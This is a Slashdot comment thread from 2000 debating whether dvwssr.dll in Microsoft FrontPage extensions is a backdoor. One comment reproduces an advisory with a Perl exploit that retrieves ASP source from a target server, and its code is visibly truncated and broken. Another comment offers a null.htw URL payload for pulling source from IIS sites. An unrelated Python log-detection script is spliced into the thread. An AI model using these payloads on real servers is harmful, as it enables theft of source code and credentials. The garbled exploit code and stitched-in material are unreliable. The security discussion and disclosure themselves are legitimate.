      To handle the case of getting locked out of your own system, you use a well-documented, well-protected service entrance. A perfect example is the OS itself, be it NT, Unix, or whatever.

      If you lock yourself out of your OS (lost the root password or something), the service entrance is to boot from CD or floppy, which gives you superuser privileges and allows you to change the superuser password(s). The security of the service entrance is due to the fact that said devices are physically connected to the machine. That is, you need physical control of the machine, the ability to touch the case, before you can exploit this. And if such a machine needs to be secure, the competent admin will put it under lock and key. We can't protect you against incompetent admins.

      If the system you are locked out of is an application rather than an OS, you can build a service entrance that requires superuser privileges. Since you can always gain superuser privileges with physical access (see above), no back door is needed.

      --

      --The basis of all love is respect

    7. Re:Backdoors in "secure software" by davew · · Score: 4
      Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in?

      You send a tech to let you back in through a well known and documented procedure that allows full access from the console, a feature you knew about and chose not to disable.

      The fact that backdoors can be useful does not excuse one being placed silently in a piece of software that is then marketed as secure. You may approve of having a remote back door; you may believe that the risk is sufficiently small to justify the potential cost savings. That's great. But that is a decision for each customer to make, and not every customer will agree.

      Separately, it's my opinion that a common remote backdoor, no matter how well hidden, will turn round and bite you on the arse eventually. This software is too well deployed; too many people are auditing it and probing it. If an engineer puts 100 hours of work into hiding it, it only takes 100 people 1 hour of searching to equal that effort. How long before someone makes that discovery? And how long after that before it is widely reported anywhere other than IRC?

      Dave
      (posted with Mozilla 2000041316)

      --

    8. Re:Backdoors in "secure software" by jamused · · Score: 4

      If you can get locked out of a mission critical system, and yet there is a way to fix the system, that way should be made available through a "front door" with proper, user configurable, security. There is no problem for which a secret way into your mission critical system is the proper solution.

  322. For those who are keeping count... by Twid · · Score: 2

    Microsoft abuses:
    - secret backdoors (this bug)
    - scour your hard drive secretly for information (Win95 registration wizard)
    - break competitor's products (Windows Media Player and Real)
    - fabricate evidence in a federal trial (Windows demonstration for Judge Jackson)
    - convicted by a Federal judge of being a harmful monopoly
    - under investigation in Europe
    - over 100 civil lawsuits pending against them.

    And that's just off the top of my head. Why would anyone with sensitive data (banks, government, etc...) trust them?

    -Twid

    --
    - "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
  323. Funny as heck, I want to be a weenie! by Duxup · · Score: 2

    I could be the only one here who thinks this is a great thing, but so be it. I'm referring only to the fact that they claim that the flaw identifies some Netscape employees as "weenies", not the flaw itself.

    You know that there's rivalry between competing companies, and they discuss how much their competition sucks. I was disappointed after Apple directed that its coders stop putting in Easter eggs, and their own names in products, and I was worried that this would keep other people from doing things like this. It's good to see this habit is still there from the days of old.
    I think some people's complaints about this are a bit exaggerated because it's M$. If Netscape or anyone else tossed in an insult about MS somewhere (and you know what I'm talking about Rick :-)) I'm sure it wouldn't be received with such hostility. I think it's great, and I'd be flattered if MS went out of their way to describe myself or my coworkers as "weenies!"

  324. Here's the scoop- by Jafa · · Score: 2

    Take a look here
    for a decent explanation. It's from Russ Cooper from NTBugtraq, who usually has some pretty good contacts. Basically, the exploit is not as far reaching as people think. The attacker needs to already have permissions to edit a website on the server. Then they can change another user's site.

    Jason

  325. yet more info- string now related to backdoor by Jafa · · Score: 2
    Here's a blurb from Russ Cooper, NTBugTraq editor. It about sums up this hype pretty well:

    Ok, so let's deal with this.

    This text string, "!seineew era sreenigne epacsteN" is embedded in the dvwssr.dll that contains the vulnerability just discussed.

    The question raised is what is this string for, and is it a secret backdoor password. At least that's what the media seems to be hyping up.

    My information says that this string is used to obfuscate file names requested via the dvwssr.dll. Nobody seems to know why they're obfuscated at this point, but it does not represent a "password". It's a piece of static data used in the obfuscating process is all.

    FYI, it was put into the program sometime in 1995, when the program was first released, and definitely not in the "height of the battle between Netscape and Microsoft".

    If you get this string to do anything for you, please let us know. The fact that the .dll has a vulnerability in it which permits anyone with web authoring permission to get access to files on other sites on the same box may have led the discoverer to believe that it was a password to enable that "functionality". My information says the two things are unrelated, the vulnerability exists whether you know the string text or not.

    Let us not make another "NSA backdoor" out of this unless/until someone can actually prove a claim about it.

    Cheers,
    Russ - NTBugtraq Editor
  326. Re:Ye gods. by FauxPasIII · · Score: 2

    > !pu dekcuf sreenigne tfosorciM

    Okay, you get a +1 funny for your signature alone ;-)

    --
    25% Funny, 25% Insightful, 25% Informative, 25% Troll
  327. Re:Ye gods. by FauxPasIII · · Score: 2

    *sigh* /me forgets you can't post and moderate in the same thread... what a stupid rule.

    --
    25% Funny, 25% Insightful, 25% Informative, 25% Troll
  328. NT Bugtraq by AugstWest · · Score: 2

    It's good of Russ to get a public statement out there, but I've yet to see anything about this actually *on* NT Bugtraq.

    Personally, I'd rather see statements sent out to his subscribers than to other press outlets. Go ahead, call me crazy.

  329. Re:So what does the file do then? by AugstWest · · Score: 2

    Good to know. But does this mean that after deleting the file you can no longer do FrontPage authoring? That's kind of the point of having them there in the first place...

  330. Jkatzman by Bob+Ince · · Score: 2

    Nah, it just looks like a revision attribution header to me. Hang on.... Jkatzman???

    Jon Katz works for MS shock!!!

    Seriously, I'm really craving some fact about now. We've got three reports from newspapers, two of which are re-runs of the original one, and all of which are from mainstream sources not historically always 100% accurate with technical matters.

    Judging by Microsoft's description of dvwssr.dll, it's there to allow authorised users to download the ASP source of a page; therefore, the break-in potential is on a par with the ::$DATA exploit that some webmasters have not yet fixed. Wise script authors try to avoid putting sensitive data (eg. database login details) in scripts, but there is still potential for break-ins.

    But we still don't know if this is exploitable. I haven't got a FrontPage client or server here to try it on, but someone must be able to have a go. Why is there still no word from Microsoft? We'll all look rather silly if we've been ranting here about a simple hidden message. Hell, I hide daft quotes and stuff like that in my binaries all the time, specifically for hackers to find.


    --
    This comment was brought to you by And Clover.
    1. Re:Jkatzman by Bob+Ince · · Score: 4
      We've got three reports from newspapers, two of which are re-runs of the original one

      Update: here's another re-run, this time from The Register.

      They include an attribution of identification to .rain.forest.puppy, who has, as they state, successfully identified other NT hacks (most recently problems with RDS). So it seems this problem is probably real.

      Shit.

      However the code got there... if this didn't get spotted by QA, I am flabbergasted at the incompetence. If this did get spotted and was let through, I am flabbergasted at the unprofessionalism. Either way, MS are going to receive a whole bowlful of flabbergast.

      I'd just like to make this point again: what I want from a web server is the ability to read HTTP requests and either read a file or call a CGI script. It should support SSL, and chunked transfer-encoding, and be fast. That is all I need.

      I do not want a web server to:

      • have extensions to let me upload pages through HTTP; FTP is perfectly good for that thank you very much.
      • do authentication; my scripts can handle that perfectly well thanks, and I don't appreciate servers fiddling with my headers and messing it up by trying to take control. IIS and Apache both think their own authentication methods are sufficient, but for any web application involving dynamic users, it's not. IIS is particularly amusing in this regard, using the NT userbase.
      • listen to any kind of protocol that isn't HTTP or HTTPS.
      • include by default all kinds of esoteric features, like IIS's selection of ASP, HTR, IDC filters, which have proved to harbour exploitable bugs.
      • include by default examples, documentation and administration tools as live, publicly accessible web sites. (IIS putting its documentation in a format that needs IIS to be actively running and in full working order to be able to read is particularly good.)
      • have custom error pages set up by default that prevent authentication and redirection from working.
      • think it can handle cache control better than me.
      • non-optionally install a bunch of system utilities without giving any idea what they do.

      Bloat begets bugs. I just want a simple web server.


      --
      This comment was brought to you by And Clover.
  331. Re:Affects "almost every Web-hosting provider." by andkaha · · Score: 2

    They should have added "using non-free server software" after that...

    --
    It's 11pm, do you know what your deamons are up to?
  332. Re:Odd? by andkaha · · Score: 2

    No, not odd at all, just incomplete.

    You have to delete a lot more than one single file to get all the bugs out...

    --
    It's 11pm, do you know what your deamons are up to?
  333. less than 21% of servers by lovebyte · · Score: 2
    According to netcraft, Microsoft web servers represented 20.93% in March. So that's not most servers as someone else said. Moreover I have found nothing yet on Microsoft web pages about this "bug". It's interesting to check Microsoft security bulletin page to see how long they will take to answer.

    --

    I'll do it for cheesy poofs.

  334. Here's Rain Forest puppy's release from the Win2k by Tweezer · · Score: 2

    Here it is. Not too much of a problem unless your authoring permissions are messed up or you're hosting multiple domains.

    ----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------

    "Netscape engineers are weenies!"
    A back door in Microsoft FrontPage extensions/authoring components

    ------------------------------------- Alf Serer / alf@at.clientlogic.com
    - rain forest puppy / rfp@wiretrip.net

    Table of contents:

    -1. The short
    -2. The long
    -3. The code

    --------------------------------------------------------------------------

    "...we love a good conspiracy theory as much as the next person..."
    - secure@microsoft.com

    --------------------------------------------------------------------------
    UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA
    --------------------------------------------------------------------------

    --[ 1. The short

    The NT 4 Option Pack ships with a particular ISAPI .dll in
    /_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft
    FrontPage extensions (the version I have is 3.0.2.1105). This particular
    .dll allows you to read .asp (and .asa) files under the web root,
    providing you know the 'password' (obfuscated encoding scheme) of which to
    ask it. And, as implied by the title, the constant key used in the
    encoding is "Netscape engineers are weenies!".

    I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to
    be used with InterDev 1.0. Therefore deleting it will affect InterDev
    1.0's 'View Links' function. Also, the default permissions don't allow
    for anonymous users to use the .dll--however, anyone with web authoring
    can, and I've seen few sites that have allowed permission (which is more
    due to a misconfiguration on their part). As Microsoft has told me, the
    immediate problem is moreso the fact that any developer of one particular
    virtual site can download the .asp code of other virtual sites on the same
    system.

    --[ 2. The long

    In the fairly recent light of Mr. Cuartango's finding of a backdoor in the
    authentication of Microsoft installation packages, Microsoft
    (secure@microsoft.com actually) stated to Bugtraq that the automatic
    acceptance of Microsoft packages is to "improve our customers' experience
    while downloading software from Microsoft web sites."

    Well, so let me relate how Microsoft has included an ISAPI .dll as part of
    the FrontPage extension package/Option Pack/Visual Interdev, to "improve a
    hacker's experience while downloading software from your web site".

    I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me
    that dvwssr.dll looked like it was a backdoor, and that it contained the
    string 'Netscape engineers are weenies!' (although, it's found backwards in
    the .dll). Being the curious pup that I am, I decided to take a look.
    Using some prior research code attempts at cracking the encoding algorithm
    (herein referred to as the 'weenie algorithm'), I used a test ISAPI app
    Alf sent to figure out what the hell this thing was for, and what it is
    supposed to do. Searches on Microsoft's site said it was to 'verify
    URLs'. However, I could not find any references to it elsewhere, and even
    decompilation of the various FrontPage extension applications, FrontPage
    clients, and Interdev clients yielded no calls or references to dvwssr.dll
    that I could see; however, I was later told that Interdev 1.0 requires this
    .dll. Microsoft's site had dvwssr.dll down on the manifest for various
    FrontPage packages/installations.

    So, taking a peek at the .dll versions, I see that the other ISAPI .dlls
    that make up the core of FrontPage extensions are of version 3.0.2.1105,
    while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was
    recently introduced into the pack by Microsoft (if you don't know,
    FrontPage was an original program developed by Vermeer Technologies Inc;
    hence the _vti_ prefixes.) Granted, maybe it's possible that Vermeer
    engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers
    left it in there. You would think some sort of Q&A and/or audit would
    catch it if it already existed...

    I'm not going to get into the exact details of the weenie encoding
    algorithm--after all, you have the code below. It's basically a 62
    character slide-rule type of encoding.

    Luckily, from my auditing, this is not included with any other versions of
    FrontPage (including Unix), and in the versions I found it on, ACLs
    prevented its use (only System and Administrators were allowed full
    access); I was told by MS that only individuals with web authoring
    permission can use it, which is more than I had originally thought. But
    it's not as widespread as, say, RDS. ;)

    Regardless of its actual purpose, or Microsoft's intent, I think the core
    interesting issue is that Microsoft literally coded (or allowed) a .dll
    who used a static key such as 'Netscape engineers are weenies!'.

    In any event, if you don't use Interdev 1.0, you can delete the file and
    call it a day. If you do use Interdev 1.0, well, it's your call, but I
    suggest an upgrade.

    --[ 3. The code

    #!/usr/bin/perl
    # dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
    #
    # Usage: dvwssr.pl target_host /file/to/retrieve/source
    #
    use Socket;

    $ip=$ARGV[0];
    $file=$ARGV[1];

    print "Encoding to: ".encodefilename($file)."\n";
    $url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
    print sendraw($url);

    sub encodefilename {
    my $from=shift;
    my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    #
    #

    my $key="Netscape engineers are weenies!";

    #
    #
    my $kc=length($from);
    my ($fv,$kv,$tmp,$to,$lett);
    @letts=split(//,$from);
    foreach $lett (@letts){
    $fv=index $slide, $lett;
    $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
    $kv=index $slide, substr $key, $kc, 1;
    if($kv>=0 && $fv>=0){
    $tmp= $kv - $fv;
    if($tmp = length($key)){ $kc=0;}
    }return $to;}

    sub sendraw {
    my ($pstr)=@_;
    my $target;
    $target= inet_aton($ip) || die("inet_aton problems");
    socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,80,$target)){
    select(S); $|=1;
    print $pstr; my @in=;
    select(STDOUT); close(S);
    return @in;
    } else { die("Can't connect...\n"); }}

    --[ 4. The End

    I know this is short and not with its usual flair. I apologize...I have
    been running around like mad, and basically don't have the time or energy
    to expend into this. :/

    - rain forest puppy

    Special thanks to Alf Serer, the founder of this bug; also, special thanks
    to attrition.org (especially McIntyre) for helping me wrangle this. I'm
    currently in the UK, so if you have immediate questions, I suggest you
    send an email to Alf or the Attrition staff (staff@attrition.org).

    Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary
    Roesch, and others, at CanSecWest, May 10-12 in Vancouver, Canada. More
    info at www.dursec.com.

    ------------------------------------- Alf Serer / alf@at.clientlogic.com
    - rain forest puppy / rfp@wiretrip.net

    Regardless if Netscape engineers are weenies, Microsoft engineers
    are definitely pompous

    ----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
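
An added detection example (not part of the post above or of the advisory it reproduces): the advisory names the exact ISAPI path, `/_vti_bin/_vti_aut/dvwssr.dll`, and says default ACLs refuse anonymous users, so an administrator can review IIS W3C extended logs for requests to it and separate refused requests from successful anonymous or authenticated ones. The log lines, the chosen field set, the verdict labels and the function names are all constructed for illustration.

```python
"""Review IIS W3C extended logs for requests to the dvwssr.dll ISAPI extension."""
from dataclasses import dataclass
from urllib.parse import unquote

# Path as given in the advisory; IIS treats URL paths case-insensitively.
TARGET_STEM = "/_vti_bin/_vti_aut/dvwssr.dll"
REQUIRED = ("c-ip", "cs-username", "cs-uri-stem", "sc-status")

# Constructed sample log, not real traffic (documentation address ranges,
# placeholder query strings).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2000-04-14 09:01:12 192.0.2.10 - GET /default.asp - 200
2000-04-14 09:02:40 192.0.2.77 - GET /_vti_bin/_vti_aut/dvwssr.dll EXAMPLEQUERY 401
2000-04-14 09:02:41 192.0.2.77 SITEA\\author1 GET /_vti_bin/_vti_aut/dvwssr.dll EXAMPLEQUERY 200
2000-04-14 09:05:03 198.51.100.5 - GET /_VTI_BIN/_vti_aut/DVWSSR.DLL EXAMPLEQUERY 200
2000-04-14 09:06:00 198.51.100.5 - GET /_vti_bin/_vti_aut/author.dll - 200
"""


@dataclass
class Finding:
    line_no: int
    client: str
    user: str
    status: int
    verdict: str


def classify(user: str, status: int) -> str:
    """Label a dvwssr.dll request by how far it got."""
    if status == 200 and user == "-":
        # Anonymous use should be refused by default ACLs, so this points
        # at misconfigured permissions on _vti_aut.
        return "anonymous-success"
    if status == 200:
        # A web author fetched source; on a shared host, check whose site.
        return "authenticated-success"
    return "denied-or-failed"


def scan(lines):
    """Return a Finding for every request that targets dvwssr.dll."""
    fields = None
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            # The #Fields directive defines the column order and may change
            # mid-file when logging settings are edited.
            if line.lower().startswith("#fields:"):
                fields = line.split(":", 1)[1].split()
                missing = [f for f in REQUIRED if f not in fields]
                if missing:
                    raise ValueError("log lacks fields: " + ", ".join(missing))
            continue
        if fields is None:
            raise ValueError("data line before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed entry
        rec = dict(zip(fields, values))
        stem = unquote(rec["cs-uri-stem"]).lower()
        if stem != TARGET_STEM:
            continue
        try:
            status = int(rec["sc-status"])
        except ValueError:
            continue
        user = rec["cs-username"]
        findings.append(
            Finding(line_no, rec["c-ip"], user, status, classify(user, status))
        )
    return findings


def by_client(findings):
    """Group verdicts per client address for triage."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f.client, []).append(f.verdict)
    return grouped


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.client} user={f.user} "
              f"status={f.status} -> {f.verdict}")
```
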

  335. Related: A Bug in IIS exposes ASP Source-Code! by try67 · · Score: 2

    Try the following URL on any .asp file running on a M$ IIS Server -
    http://www.yoursite.com/null.htw?CiWebHitsFile=/yourfile.asp%20&CiRestriction=none&CiHiliteType=Full
    Microsoft published a patch for it, but I'm still able to get most Source-Codes of the net's most popular sites w/o any problems...
    Enjoy!

    --

    To the fool, he who speaks wisdom will sound foolish. ---Euripides
  336. It's not a backdoor it's a BUG--READ THIS by ecampbel · · Score: 2

    Please read this ZDNet story:
    http://news.excite.com/news/zd/000414/15/doubt-cast-on

    As you'll see this is nothing more than a bug in an older version of Microsoft's software. The article states, While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users.

    --

    Sig goes here
  337. Re:Not MS policy by spiralx · · Score: 2

    Perhaps so. But does that make MS look better, or worse?

    Depends on your perspective I suppose - you could argue it either way. This level of incompetence in such a serious project for MS - given their push to dominate the server business - would seriously harm their credibility in the market, and could lose them a lot of business and the trust (don't ask me why) of a lot of current clients. They will now be wary of other holes as you say, and I agree that, intentional or not, this will be a huge blow for MS.

    Heads will be rolling at MS's programming team - they'll be needing plenty of scapegoats for this one :)

  338. Re:I know the phrase... by guran · · Score: 2
    /global.asa is where you put session variables and global event handlers for IIS.

    Things like user validation scripts, userID/PWD for that database on the "secure" server next door.

    If you (the IIS developer guy) know what you are doing, a hacker reading your global.asa is no big problem. If you count on nobody ever seeing that source (aka security through obscurity), you are in big trouble.

    Sort of like putting your login script on the web.

    --

    All opinions are my own - until criticized

  339. Might be a feature after all... (Re:Not MS policy) by bero-rh · · Score: 2

    The article states Windows 2000 is not affected,
    so here's the only reason why anyone should update to Windows 2000 and pay yet another $1,000,000,000 to M$ and its hardware partners...

    --
    This message is provided under the terms outlined at http://www.bero.org/terms.html
  340. IE 5.0 _does_ have a real easter egg! by athmanb · · Score: 2

    Add the language 'ie-ee' to your language settings and move it all the way to the top.
    Then press the Search button (make sure the function hasn't been modified by your ISP), and press Customize (or whatever, I'm only familiar with the german version of IE)

    Then, you'll get a Godzilla type lizard being squashed by a IE logo.

  341. Re:Russ Cooper says "NO VULNERABILITY" by Ru610 · · Score: 2

    Well, there was a reply to the above post on ntbugtraq by Gerardo Richarte who says that there is a security hole in the dll. The exploit code is included in the post.

  342. Re:This bug report is BOGUS! (moderate up!) by bad-badtz-maru · · Score: 2

    Oops, the shift key stuck and accidentally submitted a blank form. Anyways, this poster is correct. Not only does the password have nothing to do with any possible exploit, nobody is actually able to reproduce the exploit, making the entire media-hyped report seem inaccurate at this point.

    Jeff

  343. Re:Affects "almost every Web-hosting provider." by kkeller · · Score: 2
    The NT shit is a necessity due to corps requiring it.

    Why don't you just drop NT and those customers, so that you can concentrate on being a Linux-based web provider? The money you lose will repay itself in the headaches you'll get rid of when you trash NT. Plus, you'll be able to target customers who want Linux: "We don't run NT! We specialize in Linux!"

    --Keith

  344. it's for crypting/decrypting. VI6 has it also by Otis_INF · · Score: 2

    Visual Interdev 6 contains a dll, MDT2LV.DLL, which also contains the string. Apparently to keep compatible with old visual interdev 1.0/old frontpage extensions websites. According to my disassembled dvwssr.dll, it's used to crypt/decrypt the querystring passed to it by the requestobject.

    Not a backdoor for sure. It's just now EASY to sniff traffic to a website, from a visual interdev 1.0 client/frontpage 1/2.0 client to a webserver with these extensions, decode the strings, then possibly get the username/password and THEN break in.

    Visual Interdev 6 uses a different scheme to communicate with the server, so it's just for old visual interdev 1.0 users (are there any left?) and old frontpage users who are vulnerable.

    so NOT a backdoor. stop the presses.
    --

    --
    Never underestimate the relief of true separation of Religion and State.
  345. How is a string backwards a backdoor? by Otis_INF · · Score: 2
    A string backwards in a certain dll. It's suddenly a password... is it? and for what? The dll itself doesn't export any functions except HttpExtensionProc to serve IIS as an isapidll.

    From MSDN:

    The FrontPage Extensions manage design-time Web permissions using the underlying security model of the host operating system on the server. Here we consider only the case where this operating system is Windows NT 4.0 with the NTFS file system.

    FrontPage manages administer and author access to a Web using the same technique. In the Web's root directory, FrontPage creates a directory named _vti_bin. Within this directory it creates two sub-directories, _vti_adm and _vti_aut. Within _vti_adm FrontPage places a file, admin.dll, and within _vti_aut it places two files, author.dll and dvwssr.dll. These DLLs are ISAPI extensions. During design-time, client requests arrive over HTTP at the server and are routed to one of these ISAPI DLLs. A request to perform an administrative function, for example, change permissions on a Web, is handled by that Web's admin.dll. A request to perform an authoring function, for example, open a Web, is handled by that Web's author.dll. A request to fetch the source code for an ASP file without processing, for example, to view the links in that file, is handled by that Web's dvwssr.dll.

    In the request, the client provides credentials that identify the user who is logged in to the client workstation. This user must have read permission (equivalent to read and execute individual permissions) for the DLL handling the request, otherwise the request is denied. Thus FrontPage restricts who may perform a given request by controlling read permission on the directories in _vti_bin. Whenever a change is made to a Web's permissions via the Web Permissions dialog box, the FrontPage Extensions on the server modify the ACLs on the directories _vti_adm and _vti_aut in that Web's _vti_bin directory accordingly.

    Note FrontPage does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories that contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FrontPage manipulates content file ACLs to manage run-time security.

    So it CAN be that there is a backdoor in the DLL, if it surpasses the checks on ACL's on the files to be accessed. If you delete the DLL, you can't edit the pages ONLINE via MS Frontpage. The reason some people use Frontpage extensions is because of this. It's highly recommended to use OR the much more secure VIdev Online edit/publish functionality, or just edit offline. (duh:)).

    So, deleting the file won't harm runtime behaviour, it will harm edit behaviour with MS Frontpage. Well... now that's a bummer ;)
    --
    --
    Never underestimate the relief of true separation of Religion and State.
  346. Taking a bomb on a plane by luckykaa · · Score: 2

    I think the idea is based on the concept of taking a bomb on a plane, so that you know that if there is a bomb, you have it and you know you won't set it off.

    The idea here is that since there are going to be n security flaws, Microsoft might as well know where they are, so they put in deliberate ones.

  347. Re:What took so long? - MS's Forced Migration™ by Yardley · · Score: 2

    Have you purchased the latest version of Microsoft's Forced Migration(TM)? It has nifty new features like fixes for some of the bugs in the last version of MS Forced Migration(TM). Without question it is a much better piece of software than Forced Migration 95(TM) and Forced Migration 98(TM). We have even fixed some of the bugs we intentionally placed in the previous code in order to give you a better user experience. Microsoft has been working hard to innovate every aspect of Forced Migration and we hope that the motivation to buy the latest release will come to you soon!

    --

    --
    He lives in a world where those who do not run the client software of the omnipresent meme are unacceptable.
  348. Re:ESR is wrong?? - not entirely... by Ron+Harwood · · Score: 2

    Ah, but the peer review that takes place is by external groups, no doubt. No one who has a vested interest in the software being made available quickly.

    Heck the company I work for has a QA dept. that is great and doesn't care how long they delay things.

    The company I used to work for is run by Steve Barkto (it's an alias, do a search - actually here I did one for you) and often the QA dept. there would be rushed... much to the chagrin of others later. No surprise considering the leader is former MS.

  349. Grounds for Netscape to sue ? by Salsaman · · Score: 2

    IANAL (;-) but I wonder if Netscape would have a defamation case against M$ if they brought this to court ? After all, it has now been proven that M$ published something which defames their engineers (albeit slightly cryptically). Anybody care to comment ?

  350. Re:Heaven's Gift? -- Nope by Fishstick · · Score: 2

    He took it down.

    here's the e-mail I exchanged with him...

    At 10:28 AM 4/14/2000, you wrote:
    >I have to tell you, I'm quite a bit disappointed by this
    >commentary:
    >
    >There are scary implications here. When you cannot
    >trust software made by one of the world's largest
    >software companies, what do you do when it comes to
    >all the little homebrew programs that are available?
    >
    >I don't know if you were expecting to get flames on
    >this or not, but...
    >
    >Indeed there are scary implications, of relying on
    >closed-source proprietary software for
    >mission-critical applications like web serving, not in
    >comparing the relative trustworthiness of the "world's
    >largest software companies" to "little homebrew
    >programs". Maybe I'm taking this the wrong way, but I
    >take offense at this as it seems to imply that some
    >betrayal of trust by Microsoft makes software created
    >by private individuals even less trustworthy.
    >
    >Shame on you.

    This was not actually the intent of that remark at all, but I can
    definitely see the concern. Considering that, along with the fact that we
    generally don't make such comments, I removed the remark.

    Thanks for bringing your concerns to my attention, my apologies for any
    offense taken.
    --
    Stephen Heaslip (Blue)
    http://www.bluesnews.com/
    All the carnage, no messy cleanup...

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  351. What motivates high quality? by Klync · · Score: 2

    All the posts above make some good points, but the topic is being discussed as if the question is "How much should a software firm focus on Quality Assurance?" I'd rather get all philosophical and open up a broader question: "What does it take to get people/organizations to produce quality work?"

    I think all the open-sourcers(?) know that, despite all the argument over tangible benefits of open source development (in software or civil engineering), one thing that is guaranteed by this system is a true, deep-seated interest, maybe even passion, for the work that is being done. The profit motive puts the actual product way lower on the worker's priority list: after the paycheck, the career advancement, etc.

    If you ask me, M$ software (to keep slagging on the obvious target) is comparable to those cheap plastic toys that are produced on the wings of a new fad. The idea for the product starts in the marketing department, with the hope of riding the wave of some new fad. The product needs only to be as good as it takes to convince people to buy it: there's no commitment to the longer-term. Now, when a civil engineer designs a bridge, I'd bet that s/he has a vision somewhere in the mind of people viewing that bridge fifty years from now and going "Now that's a good bridge!" GPL+(value-added-services) is one way to provide a "niche" in the economy for people who are motivated by their visions. But, as we've all heard, everyone must be a salesman in the 21st C. This is how we survive in the "dog-eat-dog" world.

    Now, I realize that I've been going off on tangents, but I guess the main thing is: this isn't a question about programming, or, hell, even strictly about business models. It's about how we relate to each other, and about what motivates us to do the things we do. Open source programmers are accomplishing two things at once: they're creating cool, cheap software, and they're changing the whole logic of group decision making. The result: a superior product at a competitive price.

    ----
    Not to be confused with Col.
  352. Re:Heaven's Gift? -- Nope by gilroy · · Score: 2
    Quoth the poster:
    No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.
    Yet on the other hand, the meek shall inherit the earth ... yet another piece of avant-garde revolutionary counterintuition.

    "And the geek shall inherit the Net..."?? :)

  353. How often... by |Soc| · · Score: 2

    How often is there a MS piece of software that isn't released without a back door? How else do we expect Billy G to take down sites against him? But, honestly, I am not surprised. Their web serving applications aren't always the most secure, and anything being accessed by the net has the potential to be insecure. MS are just better at it than others.

  354. Closed code sux. Now, how were DES S boxes picked? by Anonymous Coward · · Score: 3

    Oh sure, we have the source code for DES, but it's packed with tables and tables and tables of magic numbers. How were they chosen? Why is there a 14 at row 1, column 1, of table S1? The how and why of S box determination is ***still*** classified to this day. Until I know how these numbers were chosen, I have no choice but to assume that it entails some sort of back door to let Feds (or some lucky h4xx0r who stumbles upon the back door) quick and easy access to my data. Because of the potential of a very quick unraveling of DES security, having everyone rely on it (esp. the world's banking systems) is setting the world up for disaster. "Not cracked yet" is not a sufficient proof of a crypto-alg's security. This could be just like Microsoft.

  355. Re:Heaven's Gift? -- Nope by Hrunting · · Score: 3

    This is a quote from the leading online gaming source, Blue's News.

    There are scary implications here. When you cannot trust software made by one of the world's largest software companies, what do you do when if[sic] comes to all the little homebrew progams that are available?

    This is exactly the mentality that keeps open-source from advancing. As strange as it may seem, the corporate world does not see open-source software go through the same sort of rigorous QA that (they assume) corporate products go through. An event such as this is only going to serve to make people doubt more software in general and that has a negative effect on open-source software which already has to face the FUD about its quality.

    No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek.

  356. AP article on this by Barbarian · · Score: 3

    Since a link has only been given to the Wall Street Journal (pay site), here's an Associated Press article on this:

    http://wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&STORYID=APIS73RF7J80

    Sorry to weasel into a reply to the first comment here with this...



  357. Audio Interview with Rain Forest Puppy by Col.+Klink+(retired) · · Score: 3

    InternetNews Radio (http://stream.internet.com/)
    has an audio interview (April 14, 2000) with Rain Forest Puppy who discovered and was able to exploit the backdoor.

    Note: Available as an MP3!

    -- Don't Tase me, bro!

  358. Re:actually... by DiningPhilosopher · · Score: 3


    Absolutely. And don't forget to further fortify it by XOR'ing it a few times with a long string of zeroes.

    --
    /* The beatings will continue until morale improves. */
  359. Security through marketing by ZamZ · · Score: 3
    To my mind the most worrying part about this is that MS discover a possible critical security problem and its users get to hear about it only as a leak to the press.

    One of the biggest indictments of proprietary commercial software is the fact that when a problem is discovered the first people to move into action from the company concerned are the marketing department, usually in full denial mode.

    What users need is an immediate alert that a problem exists, followed by a fulfilled promise to get a technical team on it until it's resolved, after which a release will be made ASAP. What they get is 'There is no problem' then 'Ok, there's a problem, but it's not that bad' followed belatedly by 'Alright, it was a major issue, but look the fix is here now. Just pay for the upgrade'

    With open source the answer might be 'We'll work on it as soon as we can' but at least there's no denial phase.

    Usually there are all sorts of get-out clauses in software licenses to excuse a company from any liability for problems that bugs might cause, but what about the case where a problem is discovered by the company that could be potentially financially damaging to its clients but it refuses to issue notice of the problem in a timely fashion?

    ZamZ

  360. Don't be too complacent. by hey! · · Score: 3

    I pretty much agree with your sentiment, it was incredibly unprofessional.

    On the other hand, I don't think open source is completely immune to this either -- after all, don't they have code reviews at Microsoft? Nothing really prevents a Red Hat engineer from doing something equally stupid. For that matter, the backdoor in question is not necessarily in the official source, is it? It could have been slipped in in binary form.

